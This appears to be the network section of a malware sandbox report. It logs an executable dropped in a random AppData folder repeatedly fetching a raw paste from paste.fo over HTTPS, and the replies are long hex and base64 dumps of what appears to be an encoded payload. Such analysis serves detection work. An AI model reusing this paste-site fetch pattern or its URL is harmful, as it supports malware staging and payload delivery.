2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 4b 64 33 6d 57 7a 6f 76 41 4c 47 2f 56 66 43 6f 31 46 44 46 6e 6c 4a 42 62 6f 2f 79 56 65 42 58 6f 37 73 4d 51 52 55 6f 34 4f 43 61 2f 44 57 67 58 58 73 62 5a 4a 6c 62 55 58 50 4b 6e 2b 54 64 79 34 47 74 44 6e 57 42 2f 78 58 57 7a 31 2f 39 30 61 4b 75 72 67 71 32 51 6a 72 50 6a 6c 6d 57 71 52 2f 7a 30 67 4e 59 68 48 50 56 79 46 53 5a 74 4d 39 2f 58 6a 4c 52 79 55 33 56 41 47 53 72 70 6f 42 30 4a 4c 48 30 37 4a 65 39 62 53 61 45 6f 61 78 39 55 6f 53 6b 73 43 44 51 58 56 54 36 74 77 59 6d 67 4b 39 32 63 47 4e 42 54 41 47 42 4b 44 61 68 43 45 4d 79 62 39 74 2b 47 31 41 6b 51 39 48 76 64 47 31 78 48 61 62 49 63 74 44 59 41 73 70 52 5a 51 35 58 49 33 4d 58 64 32 70 47 5a 68 4c 30 50 37 4b 78 5a 2f 76 5a 73 36 5a 41 74 74 6f 75 59 70 74 2f 2f 2b 2f 71 6b 79 67 Data Ascii: Kd3mWzovALG/VfCo1FDFnlJBbo/yVeBXo7sMQRUo4OCa/DWgXXsbZJlbUXPKn+Tdy4GtDnWB/xXWz1/90aKurgq2QjrPjlmWqR/z0gNYhHPVyFSZtM9/XjLRyU3VAGSrpoB0JLH07Je9bSaEoax9UoSksCDQXVT6twYmgK92cGNBTAGBKDahCEMyb9t+G1AkQ9HvdG1xHabIctDYAspRZQ5XI3MXd2pGZhL0P7KxZ/vZs6ZAttouYpt//+/qkyg
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 50 30 65 44 67 2b 6f 38 6f 7a 56 58 6b 58 6e 74 65 4e 73 34 32 52 47 37 53 48 2b 59 53 69 74 4e 47 78 39 4d 32 50 4f 52 35 4c 49 44 59 6f 43 32 39 63 4c 64 43 62 63 52 53 4c 75 70 4d 50 34 58 51 41 53 33 67 35 45 2b 59 6b 7a 63 56 6f 67 49 76 4e 4e 34 73 4b 49 7a 44 48 77 55 66 44 53 32 75 51 61 2b 35 58 6c 51 4e 38 45 36 51 65 4b 63 32 4b 67 72 77 66 58 58 53 73 37 45 34 6a 71 38 7a 33 70 35 73 33 54 43 54 46 4e 66 30 54 79 6b 67 4c 56 42 59 30 33 77 31 54 55 48 31 6d 32 56 55 57 66 62 35 35 63 34 59 2f 76 37 61 48 71 77 52 57 6d 50 77 54 6e 50 78 72 57 37 64 78 6b 38 65 45 6f 77 41 36 33 38 52 6a 53 69 51 2b 4b 46 58 62 2f 68 6d 35 48 56 69 47 43 70 69 6f 41 4e 43 41 64 64 34 4f 63 55 65 64 62 66 37 41 44 66 78 69 74 66 6b 75 47 75 42 4f 6b 75 6c 4f 35 Data Ascii: P0eDg+o8ozVXkXnteNs42RG7SH+YSitNGx9M2POR5LIDYoC29cLdCbcRSLupMP4XQAS3g5E+YkzcVogIvNN4sKIzDHwUfDS2uQa+5XlQN8E6QeKc2KgrwfXXSs7E4jq8z3p5s3TCTFNf0TykgLVBY03w1TUH1m2VUWfb55c4Y/v7aHqwRWmPwTnPxrW7dxk8eEowA638RjSiQ+KFXb/hm5HViGCpioANCAdd4OcUedbf7ADfxitfkuGuBOkulO5
2024-08-08 00:36:01 UTC	1369	IN	Data Raw: 6b 51 39 42 42 4f 74 6d 58 44 6b 54 70 56 36 4e 74 78 35 7a 46 79 6d 4a 67 6b 63 68 6c 46 53 56 37 30 7a 4f 52 6e 4a 75 6c 61 6e 7a 32 73 76 63 36 62 4d 4c 62 58 59 46 32 2b 6d 37 76 48 6e 44 38 75 42 50 78 63 5a 39 62 39 35 6d 78 58 6a 62 32 75 71 70 74 59 34 31 72 69 61 38 75 6f 38 69 47 6e 4b 73 30 67 34 75 4b 45 69 2b 55 57 75 41 65 4b 74 7a 44 59 70 54 57 49 38 56 6d 2f 51 74 58 58 51 73 55 51 78 48 51 68 33 55 44 4a 46 39 47 72 2f 72 57 47 34 5a 64 33 74 2f 39 58 74 32 49 4c 4f 51 36 56 4f 47 4e 45 61 58 62 38 68 5a 4e 7a 6e 50 42 4f 4a 6a 35 52 38 35 4b 45 2b 4b 34 33 35 62 49 71 2f 6e 45 6b 42 46 49 43 4a 74 36 48 4e 4e 70 4c 76 33 2b 6a 52 71 43 46 70 74 4c 6c 2b 44 32 6b 2f 65 2b 6e 39 49 6c 2b 4c 64 52 64 73 6b 4e 63 58 42 66 36 73 4d 43 43 41 Data Ascii: kQ9BBOtmXDkTpV6Ntx5zFymJgkchlFSV70zORnJulanz2svc6bMLbXYF2+m7vHnD8uBPxcZ9b95mxXjb2uqptY41ria8uo8iGnKs0g4uKEi+UWuAeKtzDYpTWI8Vm/QtXXQsUQxHQh3UDJF9Gr/rWG4Zd3t/9Xt2ILOQ6VOGNEaXb8hZNznPBOJj5R85KE+K435bIq/nEkBFICJt6HNNpLv3+jRqCFptLl+D2k/e+n9Il+LdRdskNcXBf6sMCCA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.28.76	443	6544	C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-08 00:36:15 UTC	73	OUT	GET /raw/9c15a0ff5499 HTTP/1.1 User-Agent: WebReader Host: paste.fo
2024-08-08 00:36:16 UTC	838	IN	HTTP/1.1 200 OK Date: Thu, 08 Aug 2024 00:36:16 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b7ccajt77fdv37223jhvb07cs0; path=/ Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhYEblZDp7qIImfeRaK%2FYWnXk7hSCY71U7sVVyafT6yl7Zq3bktT4gpeG08BDZ1Vn106kNLbpz0kahQahqeOI%2Fhap6%2BoZj1FQsNduAlR75eDlgzpcaTCHll%2F0A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8afb6e6059d5c46d-EWR alt-svc: h3=":443"; ma=86400
2024-08-08 00:36:16 UTC	531	IN	Data Raw: 34 37 66 64 0d 0a 68 51 52 54 45 6f 7a 32 74 6a 51 4d 57 7a 67 2f 6b 6a 52 5a 58 4e 67 37 59 42 77 66 69 38 2f 46 54 62 4f 62 76 55 2f 61 31 59 35 2b 30 42 2b 34 74 48 54 65 43 58 39 62 6d 34 71 50 4c 44 68 7a 63 53 56 47 32 65 54 71 53 74 36 59 56 78 75 6f 6c 35 2b 6b 4b 38 39 44 44 66 62 62 53 50 35 61 6b 77 47 6e 50 68 5a 65 45 51 7a 50 37 73 78 59 47 4c 56 52 2b 76 59 7a 31 4e 67 44 68 58 55 45 6d 58 6f 59 33 63 6b 6f 39 33 6c 6f 6b 42 64 46 67 35 53 55 41 73 39 53 59 6b 79 52 34 38 4a 2b 73 4c 59 6f 34 30 73 4a 65 5a 45 45 6a 68 4a 78 47 66 43 47 43 41 65 62 72 72 73 49 30 76 32 75 4e 2f 6a 4f 4a 72 67 46 68 56 77 34 4b 46 73 59 6c 5a 69 35 74 76 65 72 53 73 67 54 6a 31 51 34 44 6b 78 52 63 43 2f 5a 65 74 30 69 46 76 4f 57 58 34 68 52 4f 65 65 6a 42 Data Ascii: 47fdhQRTEoz2tjQMWzg/kjRZXNg7YBwfi8/FTbObvU/a1Y5+0B+4tHTeCX9bm4qPLDhzcSVG2eTqSt6YVxuol5+kK89DDfbbSP5akwGnPhZeEQzP7sxYGLVR+vYz1NgDhXUEmXoY3cko93lokBdFg5SUAs9SYkyR48J+sLYo40sJeZEEjhJxGfCGCAebrrsI0v2uN/jOJrgFhVw4KFsYlZi5tverSsgTj1Q4DkxRcC/Zet0iFvOWX4hROeejB
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 30 50 57 62 53 63 72 30 5a 4f 65 78 4a 44 2b 35 75 71 57 73 52 67 38 65 4e 30 72 47 51 61 61 78 47 70 4a 2b 51 37 30 59 74 71 79 52 51 43 46 56 58 4b 77 6d 39 63 44 59 47 35 39 61 6a 69 79 6a 4e 78 54 50 6f 6a 45 32 34 39 48 65 55 59 6a 65 31 52 31 53 72 74 73 55 53 78 32 63 66 32 65 2f 38 78 30 46 33 74 6a 6e 37 36 6b 76 4a 54 70 32 43 58 4f 57 69 30 75 57 4c 4b 53 2b 32 44 67 44 4b 43 50 47 48 41 4b 54 71 59 6b 62 58 33 58 77 38 36 33 72 53 6c 6d 68 57 73 63 64 71 4e 5a 35 76 5a 31 2f 71 6a 7a 37 67 32 65 71 6e 59 5a 70 41 46 6c 6e 42 78 50 43 31 6e 6f 31 42 43 4c 65 71 63 59 78 54 56 53 76 76 55 32 57 6b 78 30 42 6b 6f 4f 5a 43 59 7a 47 65 6f 6d 66 5a 6e 7a 7a 31 4a 6d 43 72 58 6e 57 62 57 4f 34 4e 31 65 38 63 5a 73 52 42 4a 41 53 38 56 79 4e 6a 77 33 Data Ascii: 0PWbScr0ZOexJD+5uqWsRg8eN0rGQaaxGpJ+Q70YtqyRQCFVXKwm9cDYG59ajiyjNxTPojE249HeUYje1R1SrtsUSx2cf2e/8x0F3tjn76kvJTp2CXOWi0uWLKS+2DgDKCPGHAKTqYkbX3Xw863rSlmhWscdqNZ5vZ1/qjz7g2eqnYZpAFlnBxPC1no1BCLeqcYxTVSvvU2Wkx0BkoOZCYzGeomfZnzz1JmCrXnWbWO4N1e8cZsRBJAS8VyNjw3
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 4a 55 68 31 6f 35 4a 2f 49 62 2b 56 49 6a 61 2b 71 53 4f 67 4c 6c 61 33 75 37 65 32 48 46 49 50 7a 77 32 4e 7a 36 4d 46 47 5a 6c 58 4e 77 52 61 6c 52 48 6b 6a 45 77 6e 2f 47 37 6b 77 45 75 4f 6a 4c 58 76 32 2f 34 47 4a 79 38 31 30 5a 53 51 70 4d 44 76 47 7a 2f 4a 52 45 47 72 77 58 33 4f 66 38 5a 59 6f 6d 73 42 2f 71 32 4a 68 4f 34 4b 37 34 58 61 45 30 57 30 4b 4c 35 61 6a 5a 67 35 66 64 55 49 6c 71 6a 4f 64 67 30 6c 6e 30 31 4d 35 53 5a 6b 49 38 61 5a 54 73 71 74 79 30 2f 38 4a 46 67 49 31 36 38 73 47 55 53 53 6e 4b 4a 37 47 38 51 64 71 31 67 43 6f 67 36 63 69 69 4d 62 74 2f 36 37 6d 52 30 37 7a 65 34 57 6a 71 50 42 38 45 69 38 37 73 45 35 58 49 46 67 79 49 68 57 76 71 56 67 4e 56 74 2f 37 4d 53 57 6c 4b 41 4b 6e 46 69 66 59 50 4a 4a 6a 73 6a 63 45 72 46 Data Ascii: JUh1o5J/Ib+VIja+qSOgLla3u7e2HFIPzw2Nz6MFGZlXNwRalRHkjEwn/G7kwEuOjLXv2/4GJy810ZSQpMDvGz/JREGrwX3Of8ZYomsB/q2JhO4K74XaE0W0KL5ajZg5fdUIlqjOdg0ln01M5SZkI8aZTsqty0/8JFgI168sGUSSnKJ7G8Qdq1gCog6ciiMbt/67mR07ze4WjqPB8Ei87sE5XIFgyIhWvqVgNVt/7MSWlKAKnFifYPJJjsjcErF
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 4b 6a 6b 39 38 4a 79 65 69 71 6c 33 31 4e 37 32 4e 64 34 38 65 61 41 4b 62 44 2b 5a 53 4a 30 4f 57 6a 61 63 75 63 65 34 65 39 4e 64 41 66 52 51 70 47 30 69 33 55 78 71 4e 37 57 74 45 30 56 34 5a 50 73 38 43 53 36 68 2b 2b 44 35 6e 6c 61 73 4e 79 76 64 33 68 51 45 76 34 34 67 4f 58 43 70 71 76 66 6d 42 71 2f 56 79 41 48 6a 48 66 31 4e 66 4c 47 34 54 61 57 4e 42 7a 44 6c 4c 6f 35 49 2f 6f 31 73 67 48 36 5a 6b 79 4d 52 50 41 45 30 38 4a 63 53 5a 65 41 61 5a 36 67 35 70 53 75 54 34 54 79 34 47 6d 2b 36 4f 55 33 31 59 4b 37 50 6f 2f 30 4c 67 69 6a 37 55 73 56 46 31 55 55 38 73 49 69 41 43 6a 75 6b 4e 47 37 5a 34 66 50 52 71 37 35 42 5a 49 47 77 68 61 66 49 69 6d 50 6b 6d 70 63 53 36 74 66 6d 7a 75 66 61 63 77 6a 43 6f 32 74 39 53 41 59 4c 33 72 69 54 64 32 44 Data Ascii: Kjk98Jyeiql31N72Nd48eaAKbD+ZSJ0OWjacuce4e9NdAfRQpG0i3UxqN7WtE0V4ZPs8CS6h++D5nlasNyvd3hQEv44gOXCpqvfmBq/VyAHjHf1NfLG4TaWNBzDlLo5I/o1sgH6ZkyMRPAE08JcSZeAaZ6g5pSuT4Ty4Gm+6OU31YK7Po/0Lgij7UsVF1UU8sIiACjukNG7Z4fPRq75BZIGwhafIimPkmpcS6tfmzufacwjCo2t9SAYL3riTd2D
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 44 52 4c 4e 7a 65 49 5a 6b 38 63 4e 74 55 78 72 45 62 39 6f 32 42 63 73 41 36 50 51 54 58 6e 59 7a 57 79 6a 6d 58 51 76 49 38 58 62 6a 30 42 51 62 4b 66 62 48 5a 74 65 32 36 44 56 47 31 5a 51 67 4c 43 59 66 61 63 4d 2f 31 34 38 79 6e 59 57 65 4b 63 64 73 55 53 59 6c 4c 54 6f 51 7a 47 61 49 49 69 73 4e 2f 50 66 33 45 50 41 41 69 53 68 54 44 6e 54 6c 4a 4c 45 50 57 6a 68 63 64 4b 4a 53 68 57 64 34 78 52 6d 56 36 4c 49 66 73 55 64 66 58 64 6c 30 65 66 63 73 62 64 7a 54 2f 65 4d 38 46 59 6d 42 65 58 66 69 45 72 5a 4e 58 50 41 6c 52 52 6f 64 75 52 31 34 35 55 4f 53 30 70 54 78 2b 6b 56 53 49 56 46 6b 6f 6d 59 33 46 2b 72 45 63 57 77 65 39 62 68 61 49 2b 32 71 34 78 6b 53 59 7a 52 55 58 34 68 75 33 63 61 54 2b 35 35 2b 45 6f 72 49 70 44 32 53 76 59 36 75 4e 37 Data Ascii: DRLNzeIZk8cNtUxrEb9o2BcsA6PQTXnYzWyjmXQvI8Xbj0BQbKfbHZte26DVG1ZQgLCYfacM/148ynYWeKcdsUSYlLToQzGaIIisN/Pf3EPAAiShTDnTlJLEPWjhcdKJShWd4xRmV6LIfsUdfXdl0efcsbdzT/eM8FYmBeXfiErZNXPAlRRoduR145UOS0pTx+kVSIVFkomY3F+rEcWwe9bhaI+2q4xkSYzRUX4hu3caT+55+EorIpD2SvY6uN7
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 32 47 51 4b 6b 34 4b 48 62 68 70 50 4b 6c 37 35 79 77 55 45 4a 78 6f 4b 43 64 35 43 42 74 65 66 35 5a 6c 5a 56 46 63 42 31 62 68 4d 76 58 39 62 47 37 6d 49 47 42 47 4e 36 2b 44 39 34 75 67 72 64 6b 53 32 52 69 4f 31 64 69 4a 37 2b 47 72 70 71 41 49 37 4d 45 35 79 42 58 63 74 62 6d 55 66 39 32 70 57 39 54 6a 79 73 69 4b 4d 5a 5a 33 46 55 51 6c 4f 75 4c 31 4a 68 57 79 41 6e 35 31 38 6a 76 32 31 6c 64 4b 6a 6f 48 73 41 75 79 4f 4e 65 33 78 6c 65 43 75 54 41 61 64 45 50 2f 61 41 58 64 6e 45 64 32 55 4d 54 73 4f 74 4f 75 33 4a 41 45 30 47 71 64 6e 73 66 4c 42 47 43 50 71 50 77 59 2b 6a 59 4e 74 6c 53 4d 69 6b 6f 6d 36 78 58 51 53 54 6f 4c 66 72 67 33 56 4d 6c 55 2b 39 51 73 54 33 6e 50 35 47 7a 78 31 4a 76 57 66 37 2f 56 68 6a 5a 57 32 31 4c 56 43 61 45 75 77 Data Ascii: 2GQKk4KHbhpPKl75ywUEJxoKCd5CBtef5ZlZVFcB1bhMvX9bG7mIGBGN6+D94ugrdkS2RiO1diJ7+GrpqAI7ME5yBXctbmUf92pW9TjysiKMZZ3FUQlOuL1JhWyAn518jv21ldKjoHsAuyONe3xleCuTAadEP/aAXdnEd2UMTsOtOu3JAE0GqdnsfLBGCPqPwY+jYNtlSMikom6xXQSToLfrg3VMlU+9QsT3nP5Gzx1JvWf7/VhjZW21LVCaEuw
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 42 75 74 76 6f 48 45 76 5a 33 51 64 72 53 42 64 68 7a 2f 63 32 33 52 34 37 2f 44 6f 56 55 67 71 4b 4e 4e 50 4f 4d 74 64 62 75 2b 6a 59 43 67 52 30 52 6d 6e 56 48 4a 53 49 61 34 68 2b 70 53 4e 50 50 43 72 73 79 35 66 6b 43 7a 61 39 61 35 30 4e 30 6c 32 46 69 4c 57 58 4e 73 73 55 39 2f 4f 38 58 63 44 69 61 68 50 56 52 33 52 57 44 56 4c 50 38 77 2f 31 69 6a 73 6a 4c 4f 4a 65 70 74 47 44 75 6f 52 2b 67 51 64 5a 54 4f 59 38 73 55 5a 36 42 32 57 6e 4f 62 49 4f 4c 72 4a 57 6e 51 4c 54 78 39 71 56 65 76 4d 56 36 42 4e 64 67 30 67 6c 79 64 76 37 6f 5a 55 31 44 73 51 77 2b 55 49 74 2b 34 4b 66 79 31 52 46 5a 75 4b 72 31 64 76 52 37 4b 67 54 4b 75 57 75 64 6a 72 6a 52 64 71 73 39 68 2f 55 4f 53 44 36 35 37 6d 41 73 58 42 37 32 2b 45 62 71 43 41 52 54 56 68 64 64 41 Data Ascii: ButvoHEvZ3QdrSBdhz/c23R47/DoVUgqKNNPOMtdbu+jYCgR0RmnVHJSIa4h+pSNPPCrsy5fkCza9a50N0l2FiLWXNssU9/O8XcDiahPVR3RWDVLP8w/1ijsjLOJeptGDuoR+gQdZTOY8sUZ6B2WnObIOLrJWnQLTx9qVevMV6BNdg0glydv7oZU1DsQw+UIt+4Kfy1RFZuKr1dvR7KgTKuWudjrjRdqs9h/UOSD657mAsXB72+EbqCARTVhddA
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 70 53 53 2b 4b 64 33 6d 57 7a 6f 76 41 4c 47 2f 56 66 43 6f 31 46 44 46 6e 6c 4a 42 62 6f 2f 79 56 65 42 58 6f 37 73 4d 51 52 55 6f 34 4f 43 61 2f 44 57 67 58 58 73 62 5a 4a 6c 62 55 58 50 4b 6e 2b 54 64 79 34 47 74 44 6e 57 42 2f 78 58 57 7a 31 2f 39 30 61 4b 75 72 67 71 32 51 6a 72 50 6a 6c 6d 57 71 52 2f 7a 30 67 4e 59 68 48 50 56 79 46 53 5a 74 4d 39 2f 58 6a 4c 52 79 55 33 56 41 47 53 72 70 6f 42 30 4a 4c 48 30 37 4a 65 39 62 53 61 45 6f 61 78 39 55 6f 53 6b 73 43 44 51 58 56 54 36 74 77 59 6d 67 4b 39 32 63 47 4e 42 54 41 47 42 4b 44 61 68 43 45 4d 79 62 39 74 2b 47 31 41 6b 51 39 48 76 64 47 31 78 48 61 62 49 63 74 44 59 41 73 70 52 5a 51 35 58 49 33 4d 58 64 32 70 47 5a 68 4c 30 50 37 4b 78 5a 2f 76 5a 73 36 5a 41 74 74 6f 75 59 70 74 2f 2f 2b 2f Data Ascii: pSS+Kd3mWzovALG/VfCo1FDFnlJBbo/yVeBXo7sMQRUo4OCa/DWgXXsbZJlbUXPKn+Tdy4GtDnWB/xXWz1/90aKurgq2QjrPjlmWqR/z0gNYhHPVyFSZtM9/XjLRyU3VAGSrpoB0JLH07Je9bSaEoax9UoSksCDQXVT6twYmgK92cGNBTAGBKDahCEMyb9t+G1AkQ9HvdG1xHabIctDYAspRZQ5XI3MXd2pGZhL0P7KxZ/vZs6ZAttouYpt//+/
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 73 42 66 45 50 30 65 44 67 2b 6f 38 6f 7a 56 58 6b 58 6e 74 65 4e 73 34 32 52 47 37 53 48 2b 59 53 69 74 4e 47 78 39 4d 32 50 4f 52 35 4c 49 44 59 6f 43 32 39 63 4c 64 43 62 63 52 53 4c 75 70 4d 50 34 58 51 41 53 33 67 35 45 2b 59 6b 7a 63 56 6f 67 49 76 4e 4e 34 73 4b 49 7a 44 48 77 55 66 44 53 32 75 51 61 2b 35 58 6c 51 4e 38 45 36 51 65 4b 63 32 4b 67 72 77 66 58 58 53 73 37 45 34 6a 71 38 7a 33 70 35 73 33 54 43 54 46 4e 66 30 54 79 6b 67 4c 56 42 59 30 33 77 31 54 55 48 31 6d 32 56 55 57 66 62 35 35 63 34 59 2f 76 37 61 48 71 77 52 57 6d 50 77 54 6e 50 78 72 57 37 64 78 6b 38 65 45 6f 77 41 36 33 38 52 6a 53 69 51 2b 4b 46 58 62 2f 68 6d 35 48 56 69 47 43 70 69 6f 41 4e 43 41 64 64 34 4f 63 55 65 64 62 66 37 41 44 66 78 69 74 66 6b 75 47 75 42 4f 6b Data Ascii: sBfEP0eDg+o8ozVXkXnteNs42RG7SH+YSitNGx9M2POR5LIDYoC29cLdCbcRSLupMP4XQAS3g5E+YkzcVogIvNN4sKIzDHwUfDS2uQa+5XlQN8E6QeKc2KgrwfXXSs7E4jq8z3p5s3TCTFNf0TykgLVBY03w1TUH1m2VUWfb55c4Y/v7aHqwRWmPwTnPxrW7dxk8eEowA638RjSiQ+KFXb/hm5HViGCpioANCAdd4OcUedbf7ADfxitfkuGuBOk
2024-08-08 00:36:16 UTC	1369	IN	Data Raw: 37 47 36 43 6b 51 39 42 42 4f 74 6d 58 44 6b 54 70 56 36 4e 74 78 35 7a 46 79 6d 4a 67 6b 63 68 6c 46 53 56 37 30 7a 4f 52 6e 4a 75 6c 61 6e 7a 32 73 76 63 36 62 4d 4c 62 58 59 46 32 2b 6d 37 76 48 6e 44 38 75 42 50 78 63 5a 39 62 39 35 6d 78 58 6a 62 32 75 71 70 74 59 34 31 72 69 61 38 75 6f 38 69 47 6e 4b 73 30 67 34 75 4b 45 69 2b 55 57 75 41 65 4b 74 7a 44 59 70 54 57 49 38 56 6d 2f 51 74 58 58 51 73 55 51 78 48 51 68 33 55 44 4a 46 39 47 72 2f 72 57 47 34 5a 64 33 74 2f 39 58 74 32 49 4c 4f 51 36 56 4f 47 4e 45 61 58 62 38 68 5a 4e 7a 6e 50 42 4f 4a 6a 35 52 38 35 4b 45 2b 4b 34 33 35 62 49 71 2f 6e 45 6b 42 46 49 43 4a 74 36 48 4e 4e 70 4c 76 33 2b 6a 52 71 43 46 70 74 4c 6c 2b 44 32 6b 2f 65 2b 6e 39 49 6c 2b 4c 64 52 64 73 6b 4e 63 58 42 66 36 73 Data Ascii: 7G6CkQ9BBOtmXDkTpV6Ntx5zFymJgkchlFSV70zORnJulanz2svc6bMLbXYF2+m7vHnD8uBPxcZ9b95mxXjb2uqptY41ria8uo8iGnKs0g4uKEi+UWuAeKtzDYpTWI8Vm/QtXXQsUQxHQh3UDJF9Gr/rWG4Zd3t/9Xt2ILOQ6VOGNEaXb8hZNznPBOJj5R85KE+K435bIq/nEkBFICJt6HNNpLv3+jRqCFptLl+D2k/e+n9Il+LdRdskNcXBf6s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.28.76	443	2284	C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-08 00:36:23 UTC	73	OUT	GET /raw/9c15a0ff5499 HTTP/1.1 User-Agent: WebReader Host: paste.fo
2024-08-08 00:36:24 UTC	836	IN	HTTP/1.1 200 OK Date: Thu, 08 Aug 2024 00:36:24 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r2ugjvevs2bb1sv04275mfn7cn; path=/ Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3zVbxOwTcndrGzQRhTTSElw8SiMqxpx8UvC9Zf6BmjWipRqxv0oksF1dYszKIamUFhJ67KVrr0yS5Ogj%2BnRgfwNd%2FTeaY4T%2BB7OlaTuhKynlvXbf7Cnkzp5Jg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8afb6e921bd31a38-EWR alt-svc: h3=":443"; ma=86400
2024-08-08 00:36:24 UTC	533	IN	Data Raw: 63 31 38 0d 0a 68 51 52 54 45 6f 7a 32 74 6a 51 4d 57 7a 67 2f 6b 6a 52 5a 58 4e 67 37 59 42 77 66 69 38 2f 46 54 62 4f 62 76 55 2f 61 31 59 35 2b 30 42 2b 34 74 48 54 65 43 58 39 62 6d 34 71 50 4c 44 68 7a 63 53 56 47 32 65 54 71 53 74 36 59 56 78 75 6f 6c 35 2b 6b 4b 38 39 44 44 66 62 62 53 50 35 61 6b 77 47 6e 50 68 5a 65 45 51 7a 50 37 73 78 59 47 4c 56 52 2b 76 59 7a 31 4e 67 44 68 58 55 45 6d 58 6f 59 33 63 6b 6f 39 33 6c 6f 6b 42 64 46 67 35 53 55 41 73 39 53 59 6b 79 52 34 38 4a 2b 73 4c 59 6f 34 30 73 4a 65 5a 45 45 6a 68 4a 78 47 66 43 47 43 41 65 62 72 72 73 49 30 76 32 75 4e 2f 6a 4f 4a 72 67 46 68 56 77 34 4b 46 73 59 6c 5a 69 35 74 76 65 72 53 73 67 54 6a 31 51 34 44 6b 78 52 63 43 2f 5a 65 74 30 69 46 76 4f 57 58 34 68 52 4f 65 65 6a 42 45 Data Ascii: c18hQRTEoz2tjQMWzg/kjRZXNg7YBwfi8/FTbObvU/a1Y5+0B+4tHTeCX9bm4qPLDhzcSVG2eTqSt6YVxuol5+kK89DDfbbSP5akwGnPhZeEQzP7sxYGLVR+vYz1NgDhXUEmXoY3cko93lokBdFg5SUAs9SYkyR48J+sLYo40sJeZEEjhJxGfCGCAebrrsI0v2uN/jOJrgFhVw4KFsYlZi5tverSsgTj1Q4DkxRcC/Zet0iFvOWX4hROeejBE
2024-08-08 00:36:24 UTC	1369	IN	Data Raw: 62 53 63 72 30 5a 4f 65 78 4a 44 2b 35 75 71 57 73 52 67 38 65 4e 30 72 47 51 61 61 78 47 70 4a 2b 51 37 30 59 74 71 79 52 51 43 46 56 58 4b 77 6d 39 63 44 59 47 35 39 61 6a 69 79 6a 4e 78 54 50 6f 6a 45 32 34 39 48 65 55 59 6a 65 31 52 31 53 72 74 73 55 53 78 32 63 66 32 65 2f 38 78 30 46 33 74 6a 6e 37 36 6b 76 4a 54 70 32 43 58 4f 57 69 30 75 57 4c 4b 53 2b 32 44 67 44 4b 43 50 47 48 41 4b 54 71 59 6b 62 58 33 58 77 38 36 33 72 53 6c 6d 68 57 73 63 64 71 4e 5a 35 76 5a 31 2f 71 6a 7a 37 67 32 65 71 6e 59 5a 70 41 46 6c 6e 42 78 50 43 31 6e 6f 31 42 43 4c 65 71 63 59 78 54 56 53 76 76 55 32 57 6b 78 30 42 6b 6f 4f 5a 43 59 7a 47 65 6f 6d 66 5a 6e 7a 7a 31 4a 6d 43 72 58 6e 57 62 57 4f 34 4e 31 65 38 63 5a 73 52 42 4a 41 53 38 56 79 4e 6a 77 33 2f 59 4d Data Ascii: bScr0ZOexJD+5uqWsRg8eN0rGQaaxGpJ+Q70YtqyRQCFVXKwm9cDYG59ajiyjNxTPojE249HeUYje1R1SrtsUSx2cf2e/8x0F3tjn76kvJTp2CXOWi0uWLKS+2DgDKCPGHAKTqYkbX3Xw863rSlmhWscdqNZ5vZ1/qjz7g2eqnYZpAFlnBxPC1no1BCLeqcYxTVSvvU2Wkx0BkoOZCYzGeomfZnzz1JmCrXnWbWO4N1e8cZsRBJAS8VyNjw3/YM
2024-08-08 00:36:24 UTC	1201	IN	Data Raw: 31 6f 35 4a 2f 49 62 2b 56 49 6a 61 2b 71 53 4f 67 4c 6c 61 33 75 37 65 32 48 46 49 50 7a 77 32 4e 7a 36 4d 46 47 5a 6c 58 4e 77 52 61 6c 52 48 6b 6a 45 77 6e 2f 47 37 6b 77 45 75 4f 6a 4c 58 76 32 2f 34 47 4a 79 38 31 30 5a 53 51 70 4d 44 76 47 7a 2f 4a 52 45 47 72 77 58 33 4f 66 38 5a 59 6f 6d 73 42 2f 71 32 4a 68 4f 34 4b 37 34 58 61 45 30 57 30 4b 4c 35 61 6a 5a 67 35 66 64 55 49 6c 71 6a 4f 64 67 30 6c 6e 30 31 4d 35 53 5a 6b 49 38 61 5a 54 73 71 74 79 30 2f 38 4a 46 67 49 31 36 38 73 47 55 53 53 6e 4b 4a 37 47 38 51 64 71 31 67 43 6f 67 36 63 69 69 4d 62 74 2f 36 37 6d 52 30 37 7a 65 34 57 6a 71 50 42 38 45 69 38 37 73 45 35 58 49 46 67 79 49 68 57 76 71 56 67 4e 56 74 2f 37 4d 53 57 6c 4b 41 4b 6e 46 69 66 59 50 4a 4a 6a 73 6a 63 45 72 46 59 5a 51 Data Ascii: 